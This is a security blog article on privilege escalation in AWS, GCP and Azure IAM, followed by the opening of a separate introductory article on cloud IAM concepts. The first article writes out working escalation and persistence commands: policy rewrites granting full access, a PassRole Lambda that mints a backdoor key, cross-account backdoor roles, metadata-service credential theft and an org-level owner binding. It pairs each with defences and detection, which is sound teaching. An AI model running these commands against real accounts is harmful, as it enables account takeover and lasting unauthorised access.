AWS IAM Privilege Escalation: How iam:PassRole Leads to Full Compromise

Reading Time: 10 minutes

Meta Description: Understand how AWS privilege escalation works through iam:PassRole — learn the attack paths attackers use and the exact policies that block each one.


What Is Cloud IAMAuthentication vs AuthorizationIAM Roles vs PoliciesAWS IAM Deep DiveGCP Resource Hierarchy IAMAzure RBAC ScopesOIDC Workload IdentityAWS IAM Privilege Escalation


TL;DR

  • Cloud breaches are IAM events — the initial compromise is just the door; the IAM configuration determines how far an attacker goes
  • iam:PassRole with Resource: * is AWS’s single highest-risk permission — it lets any principal assign any role to any service they can create
  • iam:CreatePolicyVersion is a one-call path to full account takeover — the attacker rewrites the policy that’s already attached to them
  • iam.serviceAccounts.actAs in GCP and Microsoft.Authorization/roleAssignments/write in Azure are direct equivalents — same threat model, different syntax
  • Enforce IMDSv2 on EC2; disable SA key creation in GCP; restrict role assignment scope in Azure
  • Alert on IAM mutations — they are low-volume, high-signal events that should never be silent

The Big Picture

  AWS IAM PRIVILEGE ESCALATION — HOW LIMITED ACCESS BECOMES FULL COMPROMISE

  Initial credential (exposed key, SSRF to IMDS, phished session)
         │
         ▼
  ┌─────────────────────────────────────────────────────────────────┐
  │  DISCOVERY (read-only, often undetected)                        │
  │  get-caller-identity · list-attached-policies · get-policy     │
  │  Result: attacker maps their permission surface in < 15 min    │
  └─────────────────────────────────────────────────────────────────┘
         │
         ▼
  ┌─────────────────────────────────────────────────────────────────┐
  │  PRIVILEGE ESCALATION — pick one path that's open:             │
  │                                                                 │
  │  iam:CreatePolicyVersion  →  rewrite your own policy to *:*    │
  │  iam:PassRole + lambda    →  invoke code under AdminRole       │
  │  iam:CreateRole +                                              │
  │    iam:AttachRolePolicy   →  create and arm a backdoor role    │
  │  iam:UpdateAssumeRolePolicy → hijack an existing admin role    │
  │  SSRF → IMDS              →  steal instance role credentials   │
  └─────────────────────────────────────────────────────────────────┘
         │
         ▼
  ┌─────────────────────────────────────────────────────────────────┐
  │  PERSISTENCE (before incident response begins)                  │
  │  Create hidden IAM user · cross-account backdoor role          │
  │  Add personal account at org level (GCP)                       │
  │  These survive: password resets, key rotation, even            │
  │  deletion of the original compromised credential               │
  └─────────────────────────────────────────────────────────────────┘
         │
         ▼
  Impact: data exfiltration · destruction · ransomware · mining

AWS IAM privilege escalation follows a consistent pattern across almost every significant cloud breach: a limited initial credential, a chain of IAM permissions that expand access, and damage that’s proportional to how much room the IAM design gave the attacker to move. This episode maps the paths — as concrete techniques with specific permissions, because defending against them requires understanding exactly what they exploit.


Introduction

AWS IAM privilege escalation turns misconfigured permissions into full account compromise — and the entry point is rarely the attack that matters. In 2019, Capital One suffered a breach that exposed over 100 million customer records. The attacker didn’t find a zero-day. They exploited an SSRF vulnerability in a web application firewall, reached the EC2 instance metadata service, retrieved temporary credentials for the instance’s IAM role, and found a role with sts:AssumeRole permissions that let it assume a more powerful role. That more powerful role had access to S3 buckets containing customer data.

The SSRF got the attacker a foothold. The IAM design determined how far they could go.

This is the pattern across almost every significant cloud breach: a limited initial credential, followed by a privilege escalation path through IAM, followed by the actual damage. The damage is determined not by the sophistication of the initial compromise but by how much room the IAM configuration gives an attacker to move.

This episode maps the paths. Not as theory — as concrete techniques with specific permissions, because understanding exactly what an attacker can do with a specific IAM misconfiguration is the only way to prioritize what to fix. The defensive controls are listed alongside each path because that’s where they’re most useful.


The Attack Chain

Most cloud account compromises follow a consistent pattern:

Initial Access
  (compromised credential — exposed access key, SSRF to IMDS,
   compromised developer workstation, phished IdP session)
    │
    ▼
Discovery
  (what am I? what can I do? what can I reach?)
    │
    ▼
Privilege Escalation
  (use existing permissions to gain more permissions)
    │
    ▼
Lateral Movement
  (access other accounts, services, resources)
    │
    ▼
Persistence
  (create backdoor identities that survive credential rotation)
    │
    ▼
Impact
  (data exfiltration, destruction, ransomware, crypto mining)

Understanding this chain tells you where to put defensive controls. You can cut the chain at any link. The earlier the better — but it’s better to have multiple cuts than to assume a single control holds.


Phase 1: Discovery — An Attacker’s First Steps

The moment an attacker has any cloud credential, they enumerate. This is low-noise, uses only read permissions, and in many environments goes completely undetected:

# AWS: establish identity
aws sts get-caller-identity
# Returns: Account, UserId, Arn — tells the attacker what they're working with

# Enumerate attached policies
aws iam list-attached-user-policies --user-name alice
aws iam list-user-policies --user-name alice
aws iam list-groups-for-user --user-name alice
aws iam list-attached-role-policies --role-name LambdaRole

# Read the actual policy document
aws iam get-policy-version \
  --policy-arn arn:aws:iam::123456789012:policy/DevAccess \
  --version-id v1

# Survey what's accessible
aws s3 ls
aws ec2 describe-instances --output table
aws secretsmanager list-secrets
aws ssm describe-parameters
# GCP: establish identity and permissions
gcloud auth list
gcloud projects get-iam-policy PROJECT_ID --format=json | \
  jq '.bindings[] | select(.members[] | contains("[email protected]"))'

# Test specific permissions
gcloud projects test-iam-permissions PROJECT_ID \
  --permissions="storage.objects.list,iam.roles.create,iam.serviceAccountKeys.create"
# Azure: establish context
az account show
az role assignment list --assignee [email protected] --all --output table

All of this is read-only. In most environments I’ve reviewed, there are no alerts on this activity unless the calls come from an unusual IP or at an unusual time. An attacker comfortable with the AWS CLI can map the permission surface of a compromised credential in 10–15 minutes.


AWS Privilege Escalation Paths

Path 1: iam:CreatePolicyVersion

The most direct path. If a principal can create a new version of a policy attached to themselves, they can rewrite it to grant anything.

# Attacker has iam:CreatePolicyVersion on a policy attached to their own role
aws iam create-policy-version \
  --policy-arn arn:aws:iam::123456789012:policy/DevPolicy \
  --policy-document '{
    "Version": "2012-10-17",
    "Statement": [{"Effect": "Allow", "Action": "*", "Resource": "*"}]
  }' \
  --set-as-default
# Result: DevPolicy now grants AdministratorAccess to everyone with it attached

The attacker doesn’t need to create new infrastructure. They inject admin access directly into their existing permission set. This is often undetected by basic monitoring because CreatePolicyVersion is a low-frequency legitimate operation.

Defence: Alert on every CreatePolicyVersion call. Restrict the permission to a dedicated break-glass IAM role. Use permissions boundaries on developer roles to cap the maximum permissions they can ever hold.

Path 2: iam:PassRole + Service Creation

iam:PassRole allows an identity to assign an IAM role to an AWS service. This is legitimate and necessary — it’s how you configure “this Lambda function runs with this role.” The attack vector: if a more powerful role exists in the account, and the attacker can pass it to a service they control and invoke that service, they operate with the more powerful role’s permissions.

# Attacker has: lambda:CreateFunction + iam:PassRole + lambda:InvokeFunction
# They know an existing AdminRole exists (discovered during enumeration)

# Create a Lambda that runs with AdminRole
aws lambda create-function \
  --function-name exfil-fn \
  --runtime python3.12 \
  --role arn:aws:iam::123456789012:role/AdminRole \
  --handler index.handler \
  --zip-file fileb://payload.zip

# Invoke — code now executes with AdminRole's permissions
aws lambda invoke --function-name exfil-fn /tmp/output.json
import boto3

def handler(event, context):
    # Running as AdminRole
    s3 = boto3.client('s3')
    buckets = s3.list_buckets()

    # Create a backdoor access key while we have elevated access
    iam = boto3.client('iam')
    key = iam.create_access_key(UserName='backdoor-user')

    return {"buckets": [b['Name'] for b in buckets['Buckets']], "key": key}

Defence: Scope iam:PassRole to specific role ARNs — never Resource: *. Example:

{
  "Effect": "Allow",
  "Action": "iam:PassRole",
  "Resource": "arn:aws:iam::123456789012:role/LambdaExecutionRole-*"
}

Path 3: iam:CreateRole + iam:AttachRolePolicy

If an attacker can both create a role and attach policies to it, they create a backdoor identity:

# Create a role with a trust policy naming an attacker-controlled principal
aws iam create-role \
  --role-name BackdoorRole \
  --assume-role-policy-document '{
    "Version": "2012-10-17",
    "Statement": [{
      "Effect": "Allow",
      "Principal": {"AWS": "arn:aws:iam::ATTACKER_ACCOUNT:root"},
      "Action": "sts:AssumeRole"
    }]
  }'

# Attach AdministratorAccess
aws iam attach-role-policy \
  --role-name BackdoorRole \
  --policy-arn arn:aws:iam::aws:policy/AdministratorAccess

# Assume it from the attacker's account — persistent cross-account access
aws sts assume-role \
  --role-arn arn:aws:iam::TARGET_ACCOUNT:role/BackdoorRole \
  --role-session-name persistent-access

This is persistence, not just escalation — the backdoor survives password resets, access key rotation, even deletion of the original compromised credential.

Path 4: iam:UpdateAssumeRolePolicy

If an existing high-privilege role already exists, modifying its trust policy to allow the attacker’s principal is faster and quieter than creating a new role:

# Add attacker's principal to the trust policy of an existing AdminRole
aws iam update-assume-role-policy \
  --role-name ExistingAdminRole \
  --policy-document '{
    "Version": "2012-10-17",
    "Statement": [
      {"Effect": "Allow", "Principal": {"Service": "ec2.amazonaws.com"}, "Action": "sts:AssumeRole"},
      {"Effect": "Allow", "Principal": {"AWS": "arn:aws:iam::123456789012:user/attacker"}, "Action": "sts:AssumeRole"}
    ]
  }'

The original entry remains intact. A casual review might miss the addition. Trust policy changes should be critical-priority alerts.

Path 5: SSRF to EC2 Instance Metadata

The Capital One path. Any SSRF vulnerability in a web application running on EC2 can retrieve the instance role’s credentials from the metadata service:

Attacker → SSRF → GET http://169.254.169.254/latest/meta-data/iam/security-credentials/
→ Returns role name
→ GET http://169.254.169.254/latest/meta-data/iam/security-credentials/MyAppRole
→ Returns: AccessKeyId, SecretAccessKey, Token (valid up to 6 hours)

Defence: IMDSv2 requires a PUT request first, blocking simple GET-based SSRF:

# Enforce IMDSv2 at instance launch
aws ec2 run-instances \
  --metadata-options HttpTokens=required,HttpPutResponseHopLimit=1

# Enforce org-wide via SCP
{
  "Effect": "Deny",
  "Action": "ec2:RunInstances",
  "Resource": "arn:aws:ec2:*:*:instance/*",
  "Condition": {
    "StringNotEquals": {"ec2:MetadataHttpTokens": "required"}
  }
}

High-Risk AWS Permissions Reference

Permission Why It’s Dangerous
iam:PassRole with Resource: * Assign any role to any service — enables immediate privilege escalation
iam:CreatePolicyVersion Rewrite any policy to grant anything — full account takeover in one API call
iam:AttachRolePolicy Attach AdministratorAccess to any role
iam:UpdateAssumeRolePolicy Add any principal to any role’s trust policy
iam:CreateAccessKey on other users Create persistent credentials for any IAM user
lambda:UpdateFunctionCode on privileged Lambda Inject malicious code into an elevated function
secretsmanager:GetSecretValue with Resource: * Read every secret in the account
ssm:GetParameter with Resource: * Read all Parameter Store values — often contains credentials
iam:CreateRole + iam:AttachRolePolicy Create and arm a backdoor role

GCP Privilege Escalation Paths

iam.serviceAccounts.actAs

GCP’s equivalent of iam:PassRole — and broader. Allows an identity to make any GCP service act as a specified service account:

# Attacker has iam.serviceAccounts.actAs on an admin SA
gcloud --impersonate-service-account=admin-sa@project.iam.gserviceaccount.com \
  iam roles list --project=my-project

# Generate a full access token and call any GCP API as admin-sa
gcloud auth print-access-token \
  --impersonate-service-account=admin-sa@project.iam.gserviceaccount.com

iam.serviceAccountKeys.create

Converts a short-lived identity into a persistent one. Create a key for an admin service account and you have indefinite access:

gcloud iam service-accounts keys create admin-key.json \
  [email protected]
# Valid until explicitly deleted — no expiry by default

# Block this at org level
gcloud org-policies set-policy --organization=ORG_ID - << 'EOF'
name: organizations/ORG_ID/policies/iam.disableServiceAccountKeyCreation
spec:
  rules:
    - enforce: true
EOF

Azure Privilege Escalation Paths

Microsoft.Authorization/roleAssignments/write

If an identity can write role assignments, it can grant itself Owner at any scope it can write to:

az role assignment create \
  --assignee [email protected] \
  --role "Owner" \
  --scope /subscriptions/SUB_ID

Managed Identity Assignment

Attach a high-privilege managed identity to a VM the attacker controls, then retrieve its token via IMDS:

az vm identity assign \
  --name attacker-vm --resource-group rg-attacker \
  --identities /subscriptions/SUB/resourcegroups/rg-prod/providers/\
Microsoft.ManagedIdentity/userAssignedIdentities/admin-identity

# From inside the VM
curl 'http://169.254.169.254/metadata/identity/oauth2/token\
?api-version=2018-02-01&resource=https://management.azure.com/' \
  -H 'Metadata: true'

Persistence — How Attackers Outlast Incident Response

# AWS: hidden IAM user with admin access
aws iam create-user --user-name svc-backup-01
aws iam attach-user-policy \
  --user-name svc-backup-01 \
  --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
aws iam create-access-key --user-name svc-backup-01
# Valid until manually deleted — survives key rotation on other identities

# AWS: cross-account backdoor — hardest to find during IR
aws iam create-role --role-name svc-monitoring-role \
  --assume-role-policy-document '{
    "Principal": {"AWS": "arn:aws:iam::ATTACKER_ACCOUNT:root"},
    "Action": "sts:AssumeRole"
  }'
aws iam attach-role-policy --role-name svc-monitoring-role \
  --policy-arn arn:aws:iam::aws:policy/ReadOnlyAccess

# GCP: add personal account at org level — survives project deletion
gcloud organizations add-iam-policy-binding ORG_ID \
  --member="user:[email protected]" --role="roles/owner"

Cross-account backdoors are particularly resilient — incident responders often focus on the compromised account without auditing trust relationships with external accounts.


Detection — What to Alert On

Activity Event to Watch Priority
Role trust policy modified UpdateAssumeRolePolicy Critical
New IAM user created CreateUser High
Policy version created CreatePolicyVersion High
Policy attached to role AttachRolePolicy, PutRolePolicy High
SA key created (GCP) google.iam.admin.v1.CreateServiceAccountKey High
Role assignment at subscription scope (Azure) roleAssignments/write at /subscriptions/ Critical
CloudTrail logging disabled StopLogging, DeleteTrail Critical
GetSecretValue at unusual hours secretsmanager:GetSecretValue Medium

IAM events are low-volume in most accounts. That makes anomaly detection straightforward — a spike in IAM API calls outside business hours from an unusual principal is a strong signal. Configure the critical-priority events as real-time alerts, not just logged events.


⚠ Production Gotchas

╔══════════════════════════════════════════════════════════════════════╗
║  ⚠  GOTCHA 1 — "We have SCPs, so individual role permissions       ║
║       don't matter as much"                                          ║
║                                                                      ║
║  SCPs set the ceiling. If an SCP allows iam:PassRole, any role      ║
║  with that permission can exploit it regardless of how "scoped"     ║
║  the SCP looks. SCPs and role-level permissions both need to be     ║
║  reviewed — they are independent layers.                            ║
╚══════════════════════════════════════════════════════════════════════╝

╔══════════════════════════════════════════════════════════════════════╗
║  ⚠  GOTCHA 2 — Permissions boundary doesn't stop iam:PassRole     ║
║                                                                      ║
║  A permissions boundary caps what a role can do directly. It does   ║
║  NOT prevent that role from passing a more powerful role to a       ║
║  Lambda or EC2. iam:PassRole escalation bypasses the boundary       ║
║  because the attacker is operating through the service, not         ║
║  directly through the bounded role.                                 ║
║                                                                      ║
║  Fix: scope iam:PassRole to specific ARNs regardless of whether     ║
║  a permissions boundary is in place.                                ║
╚══════════════════════════════════════════════════════════════════════╝

╔══════════════════════════════════════════════════════════════════════╗
║  ⚠  GOTCHA 3 — CloudTrail doesn't log data plane events by default ║
║                                                                      ║
║  S3 object reads (GetObject), Secrets Manager reads (GetSecretValue)║
║  and SSM GetParameter are data events — not logged by CloudTrail   ║
║  unless you explicitly enable Data Events. An attacker exfiltrating ║
║  data via these calls leaves no trace in a default CloudTrail       ║
║  configuration.                                                      ║
║                                                                      ║
║  Fix: enable S3 and Lambda data events in CloudTrail. At minimum    ║
║  enable logging for secretsmanager:GetSecretValue.                  ║
╚══════════════════════════════════════════════════════════════════════╝

Quick Reference

┌──────────────────────────────────┬──────────────────────────────────────────────────────┐
│ Permission                       │ Escalation Path                                      │
├──────────────────────────────────┼──────────────────────────────────────────────────────┤
│ iam:CreatePolicyVersion          │ Rewrite your own policy to grant *:*                 │
│ iam:PassRole (Resource: *)       │ Assign AdminRole to a Lambda/EC2 you control         │
│ iam:CreateRole+AttachRolePolicy  │ Create and arm a backdoor cross-account role         │
│ iam:UpdateAssumeRolePolicy       │ Hijack existing admin role's trust policy            │
│ iam.serviceAccounts.actAs (GCP)  │ Impersonate any service account including admins     │
│ iam.serviceAccountKeys.create    │ Generate permanent key for any SA                    │
│ roleAssignments/write (Azure)    │ Assign Owner to yourself at subscription scope       │
└──────────────────────────────────┴──────────────────────────────────────────────────────┘

Defensive commands:
┌────────────────────────────────────────────────────────────────────────────────────────┐
│  # AWS — find all roles with iam:PassRole on Resource: *                              │
│  aws iam list-policies --scope Local --query 'Policies[*].Arn' --output text | \     │
│    xargs -I{} aws iam get-policy-version \                                            │
│      --policy-arn {} --version-id v1 --query 'PolicyVersion.Document'                │
│                                                                                        │
│  # AWS — check who can assume a given role                                            │
│  aws iam get-role --role-name AdminRole \                                             │
│    --query 'Role.AssumeRolePolicyDocument'                                            │
│                                                                                        │
│  # AWS — simulate whether a principal can CreatePolicyVersion                        │
│  aws iam simulate-principal-policy \                                                  │
│    --policy-source-arn arn:aws:iam::ACCOUNT:role/DevRole \                           │
│    --action-names iam:CreatePolicyVersion \                                           │
│    --resource-arns arn:aws:iam::ACCOUNT:policy/DevPolicy                             │
│                                                                                        │
│  # GCP — check who has actAs on a service account                                    │
│  gcloud iam service-accounts get-iam-policy SA_EMAIL \                               │
│    --format=json | jq '.bindings[] | select(.role=="roles/iam.serviceAccountUser")'  │
│                                                                                        │
│  # GCP — list service account keys (find persistent backdoors)                       │
│  gcloud iam service-accounts keys list --iam-account=SA_EMAIL                        │
│                                                                                        │
│  # Azure — list all role assignments at subscription scope                           │
│  az role assignment list --scope /subscriptions/SUB_ID --output table                │
└────────────────────────────────────────────────────────────────────────────────────────┘

Framework Alignment

Framework Reference What It Covers Here
CISSP Domain 6 — Security Assessment and Testing IAM attack paths are the foundation of cloud penetration testing and access review methodology
CISSP Domain 5 — Identity and Access Management Defensive IAM design requires understanding offensive technique — you cannot protect paths you don’t know exist
ISO 27001:2022 8.8 Management of technical vulnerabilities IAM misconfigurations are technical vulnerabilities — identifying and remediating privilege escalation paths
ISO 27001:2022 8.16 Monitoring activities Detection signals and alerting on IAM mutations as part of continuous monitoring
SOC 2 CC7.1 Threat and vulnerability identification — this episode maps the threat model for cloud IAM
SOC 2 CC6.1 Understanding attack paths informs the design of logical access controls that actually hold

Key Takeaways

  • Cloud breaches are IAM events — the initial compromise is just the door; IAM misconfigurations determine how far an attacker can go
  • iam:PassRole with Resource: * is AWS’s highest-risk single permission — scope it to specific role ARNs or the escalation paths multiply
  • iam:CreatePolicyVersion and iam:UpdateAssumeRolePolicy are privilege escalation and persistence primitives — restrict them to dedicated admin roles
  • iam.serviceAccounts.actAs in GCP and roleAssignments/write in Azure are direct equivalents — same threat model, cloud-specific syntax
  • Enforce IMDSv2 on EC2; disable SA key creation org-wide in GCP; restrict role assignment scope in Azure
  • Enable CloudTrail Data Events — default logging misses S3 reads, Secrets Manager reads, and SSM GetParameter calls entirely
  • Alert on IAM mutations — low-volume, high-signal events that should never go unmonitored

What’s Next

You now know how attackers move through misconfigured IAM. AWS least privilege audit is the defensive counterpart — using Access Analyzer, GCP IAM Recommender, and Azure Access Reviews to find and right-size over-permissioned access before an attacker does. The goal: get from wildcard policies to scoped, auditable permissions without breaking production.

Next: AWS Least Privilege Audit: From Wildcard Permissions to Scoped Policies

Get EP09 in your inbox when it publishes → linuxcent.com/subscribe

What Is Cloud IAM — and Why Every API Call Depends on It

Reading Time: 11 minutes

Meta Description: Understand what cloud IAM is and why every API call in AWS, GCP, and Azure hits a deny-by-default check — the foundational model behind all cloud access.


What Is Cloud IAMAuthentication vs AuthorizationIAM Roles vs PoliciesAWS IAM Deep DiveGCP Resource Hierarchy IAMAzure RBAC Scopes


TL;DR

  • Cloud IAM is the system that decides whether any API call is allowed or denied — deny by default, explicit Allow required at every layer
  • Every API call answers four questions: Who? (Identity) What? (Action) On what? (Resource) Under what conditions? (Context)
  • Two identity types in every cloud account: human (engineers) and machine (Lambda, EC2, Kubernetes pods) — machine identities outnumber human by 10:1 in most production environments
  • AWS, GCP, and Azure share the same model: deny-by-default, policy-driven, principal-based — different syntax, same mental model
  • The gap between granted and used permissions is where attackers move — the average IAM entity uses under 5% of its granted permissions
  • IAM failure has two modes: over-permissioned (“it works”) and over-restricted (“it’s secure, engineers work around it”) — both end in incidents

The Big Picture

                        WHAT IS CLOUD IAM?

  Every API call in AWS, GCP, or Azure answers four questions:

  ┌─────────────┐   ┌─────────────┐   ┌─────────────┐   ┌─────────────┐
  │    WHO?     │   │   WHAT?     │   │  ON WHAT?   │   │  UNDER      │
  │             │   │             │   │             │   │  WHAT?      │
  │  Identity / │   │  Action /   │   │  Resource   │   │             │
  │  Principal  │   │  Permission │   │             │   │  Condition  │
  │             │   │             │   │             │   │             │
  │ IAM Role    │   │ s3:GetObject│   │ arn:aws:s3: │   │ MFA: true   │
  │ Svc Account │   │ ec2:Start   │   │ ::prod-data │   │ IP: 10.0/8  │
  │ Managed     │   │ iam:        │   │ /exports/*  │   │ Time: 09-17 │
  │ Identity    │   │   PassRole  │   │             │   │             │
  └─────────────┘   └─────────────┘   └─────────────┘   └─────────────┘
        └────────────────┴────────────────┴────────────────┘
                                  │
                     ┌────────────▼────────────┐
                     │    IAM Policy Engine    │
                     │    deny by default      │
                     │                         │
                     │  Explicit ALLOW?   ─────┼──→  PERMIT
                     │  Explicit DENY?    ─────┼──→  DENY (overrides Allow)
                     │  No matching rule? ─────┼──→  DENY (implicit)
                     └─────────────────────────┘

Cloud IAM is the answer to a question every growing infrastructure team hits: at scale, how do you know who can do what, why they can do it, and whether they still should?


Introduction

Cloud IAM (Identity and Access Management) is the control plane for access in every major cloud provider. Every API call — reading a file, starting an instance, invoking a function — goes through an IAM evaluation. The result is binary: explicit Allow or deny. There is no implicit access. Nothing is open by default. This is what makes cloud IAM fundamentally different from the access models that came before it.

Understanding why it works that way requires tracing how access control evolved — and what kept breaking at each stage.

A few years into my career managing Linux infrastructure, I was handed a production server audit. The task was straightforward: find out who had access to what. I pulled /etc/passwd, checked the sudoers file, reviewed SSH authorized_keys across the fleet.

Three days later, I had a spreadsheet nobody wanted to read.

The problem wasn’t that the access was wrong. Most of it was fine. The problem was that nobody — not the team lead, not the security team, not the engineers who’d been there five years — could tell me why a particular account had access to a particular server. It had accumulated. People joined, got access, changed teams, left. The access stayed.

That was a 40-server fleet in 2012.

Fast-forward to a cloud environment today: you might have 50 engineers, 300 Lambda functions, 20 microservices, CI/CD pipelines, third-party integrations, compliance scanners — all making API calls, all needing access to something. The identity sprawl problem I spent three days auditing manually on 40 servers now exists at a scale where manual auditing isn’t even a conversation.

This is the problem Identity and Access Management exists to solve. Not just in theory — in practice, at the scale cloud infrastructure demands.


How We Got Here — The Evolution of Access Control

To understand why cloud IAM works the way it does, you need to trace how access control evolved. The design decisions in AWS IAM, GCP, and Azure didn’t come out of nowhere. They’re answers to lessons learned the hard way across decades of broken systems.

The Unix Model (1970s–1990s): Simple and Sufficient

Unix got the fundamentals right early. Every resource (file, device, process) has an owner and a group. Every action is one of three: read, write, execute. Every user is either the owner, in the group, or everyone else.

-rw-r--r--  1 vamshi  engineers  4096 Apr 11 09:00 deploy.conf
# owner can read/write | group can read | others can read

For a single machine or a small network, this model is elegant. The permissions are visible in a ls -l. Reasoning about access is straightforward. Auditing means reading a few files.

However, the cracks started showing when organizations grew. You’d add sudo to give specific commands to specific users. Then sudoers files became 300 lines long. Then you’d have shared accounts because managing individual ones was “too much overhead.” Shared accounts mean no individual accountability. No accountability means no audit trail worth anything.

The Directory Era (1990s–2000s): Centralise or Collapse

As networks grew, every server managing its own /etc/passwd became untenable. Enter LDAP and Active Directory. Instead of distributing identity management across every machine, you centralised it: one directory, one place to add users, one place to disable them when someone left.

This was a significant step forward. Onboarding got faster. Offboarding became reliable. Group membership drove access to resources across the network.

Why Groups Became the New Problem

But the permission model was still coarse. You were either in the Domain Admins group or you weren’t. “Read access to the file share” was a group. “Deploy to the staging web server” was a group. Managing fine-grained permissions at scale meant managing hundreds of groups, and the groups themselves became the audit nightmare.

I spent time in environments like this. The group named SG_Prod_App_ReadWrite_v2_FINAL that nobody could explain. The AD group from a project that ended three years ago but was still in twenty user accounts. The contractor whose AD account was disabled but whose service account was still running a nightly job.

The directory model centralised identity. It didn’t solve the permissions sprawl problem.

The Cloud Shift (2006–2014): Everything Changes

AWS launched EC2 in 2006. In 2011, AWS IAM went into general availability. That date matters — for the first five years of AWS, access control was primitive. Root accounts. Access keys. No roles.

Early AWS environments I’ve seen (and had to clean up) reflect this era: a single root account access key shared across a team, rotated manually on a shared spreadsheet. Static credentials in application config files. EC2 instances with AdministratorAccess because “it was easier at the time.”

The Model That Changed Everything

The AWS team understood what they’d built was dangerous. IAM in 2011 introduced the model that all three major cloud providers now share: deny-by-default, policy-driven, principal-based access control. Not “who is in which group.” The question became: which policy explicitly grants this specific action on this specific resource to this specific identity.

GCP launched its IAM model with a different flavour in 2012 — hierarchical, additive, binding-based. Azure RBAC came to general availability in 2014, built on top of Active Directory’s identity model.

By 2015, the modern cloud IAM era was established. The primitives existed. The problem shifted from “does IAM exist?” to “are we using it correctly?” — and most teams were not.

In practice, that question is still the right one to ask today.


The Problem IAM Actually Solves

Here’s the honest version of what IAM is for, based on what I’ve seen go wrong without it.

Without proper IAM, you get one of two outcomes:

The first is what I call the “it works” environment. Everything runs. The developers are happy. Access requests take five minutes because everyone gets the same broad policy. And then a Lambda function’s execution role — which had s3:* on * because someone once needed to debug something — gets its credentials exposed through an SSRF vulnerability in the app it runs. That role can now read every bucket in the account, including the one with the customer database exports.

The second is the “it’s secure” environment. Access is locked down. Every request goes through a ticket. The ticket goes to a security team that approves it in three to five business days. Engineers work around it by storing credentials locally. The workarounds become the real access model. The formal IAM posture and the actual access posture diverge. The audit finds the formal one. Attackers find the real one.

IAM, done right, is the discipline of walking the line between those two outcomes. It’s not a product you buy or a feature you turn on. It’s a practice — a continuous process of defining what access exists, why it exists, and whether it’s still needed.


The Core Concepts — Taught, Not Listed

Let me walk you through the vocabulary you need, grounded in what each concept means in practice.

Identity: Who Is Making This Request?

An identity is any entity that can hold a credential and make requests. In cloud environments, identities split into two types:

Human identities are engineers, operators, and developers. They authenticate via the console, CLI, or SDK. They should ideally authenticate through a central IdP (Okta, Google Workspace, Entra ID) using federation — more on that in SAML vs OIDC: Which Federation Protocol Belongs in Your Cloud?.

Machine identities are everything else: Lambda functions, EC2 instances, Kubernetes pods, CI/CD pipelines, monitoring agents, data pipelines. In most production environments, machine identities outnumber human identities by 10:1 or more.

This ratio matters. When your security model is designed primarily for human access, the 90% of identities that are machines become an afterthought. That’s where access keys end up in environment variables, where Lambda functions get broad permissions because nobody thought carefully about what they actually need, where the real attack surface lives.

Principal: The Authenticated Identity Making a Specific Request

A principal is an identity that has been authenticated and is currently making a request. The distinction from “identity” is subtle but important: the principal includes the context of how the identity authenticated.

In AWS, an IAM role assumed by EC2, assumed by a Lambda, and assumed by a developer’s CLI session are three different principals — even if they all assume the same role. The session context, source, and expiration differ.

{
  "Principal": {
    "AWS": "arn:aws:iam::123456789012:role/DataPipelineRole"
  }
}

In GCP, the equivalent term is member. In Azure, it’s security principal — a user, group, service principal, or managed identity.

Resource: What Is Being Accessed?

A resource is whatever is being acted upon. In AWS, every resource has an ARN (Amazon Resource Name) — a globally unique identifier.

arn:aws:s3:::customer-data-prod          # S3 bucket
arn:aws:s3:::customer-data-prod/*        # everything inside that bucket
arn:aws:ec2:ap-south-1:123456789012:instance/i-0abcdef1234567890
arn:aws:iam::123456789012:role/DataPipelineRole

The ARN structure tells you: service, region, account, resource type, resource name. Once you can read ARNs fluently, IAM policies become much less intimidating.

Action: What Is Being Done?

An action (AWS/Azure) or permission (GCP) is the operation being attempted. Cloud providers express these as service:Operation strings:

# AWS
s3:GetObject           # read a specific object
s3:PutObject           # write an object
s3:DeleteObject        # delete an object — treat differently than read
iam:PassRole           # assign a role to a service — one of the most dangerous permissions
ec2:DescribeInstances  # list instances — often overlooked, but reveals infrastructure

# GCP
storage.objects.get
storage.objects.create
iam.serviceAccounts.actAs   # impersonate a service account — equivalent to iam:PassRole danger

When I audit IAM configurations, I pay special attention to any policy that includes iam:*, iam:PassRole, or wildcards like "Action": "*". These are the permissions that let a compromised identity create new identities, assign itself more power, or impersonate other accounts. They’re the privilege escalation primitives — more on that in AWS IAM Privilege Escalation: How iam:PassRole Leads to Full Compromise.

Policy: The Document That Connects Everything

A policy is a document that says: this principal can perform these actions on these resources, under these conditions.

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "ReadCustomerDataBucket",
      "Effect": "Allow",
      "Action": [
        "s3:GetObject",
        "s3:ListBucket"
      ],
      "Resource": [
        "arn:aws:s3:::customer-data-prod",
        "arn:aws:s3:::customer-data-prod/*"
      ]
    }
  ]
}

Notice what’s explicit here: the effect (Allow), the exact actions (not s3:*), and the exact resource (not *). Every word in this document is a deliberate decision. The moment you start using wildcards to save typing, you’re writing technical debt that will come back as a security incident.


How IAM Actually Works — The Decision Flow

When any API call hits a cloud service, an IAM engine evaluates it. Understanding this flow is the foundation of debugging access issues, and more importantly, of understanding why your security posture is what it is.

Request arrives:
  Action:    s3:PutObject
  Resource:  arn:aws:s3:::customer-data-prod/exports/2026-04-11.csv
  Principal: arn:aws:iam::123456789012:role/DataPipelineRole
  Context:   { source_ip: "10.0.2.15", mfa: false, time: "02:30 UTC" }

IAM Engine evaluation (AWS):
  1. Is there an explicit Deny anywhere? → No
  2. Does the SCP (if any) allow this? → Yes
  3. Does the identity-based policy allow this? → Yes (via DataPipelinePolicy)
  4. Does the resource-based policy (bucket policy) allow or deny? → No explicit rule → implicit allow for same-account
  5. Is there a permissions boundary? → No
  Decision: ALLOW

The critical insight here: cloud IAM is deny-by-default. There is no implicit allow. If there is no policy that explicitly grants s3:PutObject to this role on this bucket, the request fails. The only way in is through an explicit "Effect": "Allow".

This is the opposite of how most traditional systems work. In a Unix permission model, if your file is world-readable (-r--r--r--), anyone can read it unless you actively restrict them. In cloud IAM, nothing is accessible unless you actively grant it.

When I’m debugging an AccessDenied error — and every engineer who works with cloud IAM spends significant time doing this — the mental model is always: “what is the chain of explicit Allows that should be granting this access, and at which layer is it missing?”


Why This Is Harder Than It Looks

Understanding the concepts is the easy part. The hard part is everything that happens at organisational scale over time.

Scale. A real AWS account in a growing company might have 600+ IAM roles, 300+ policies, and 40+ cross-account trust relationships. None of these were designed together. They evolved incrementally, each change made by someone who understood the context at the time and may have left the organisation since. The cumulative effect is an IAM configuration that no single person fully understands.

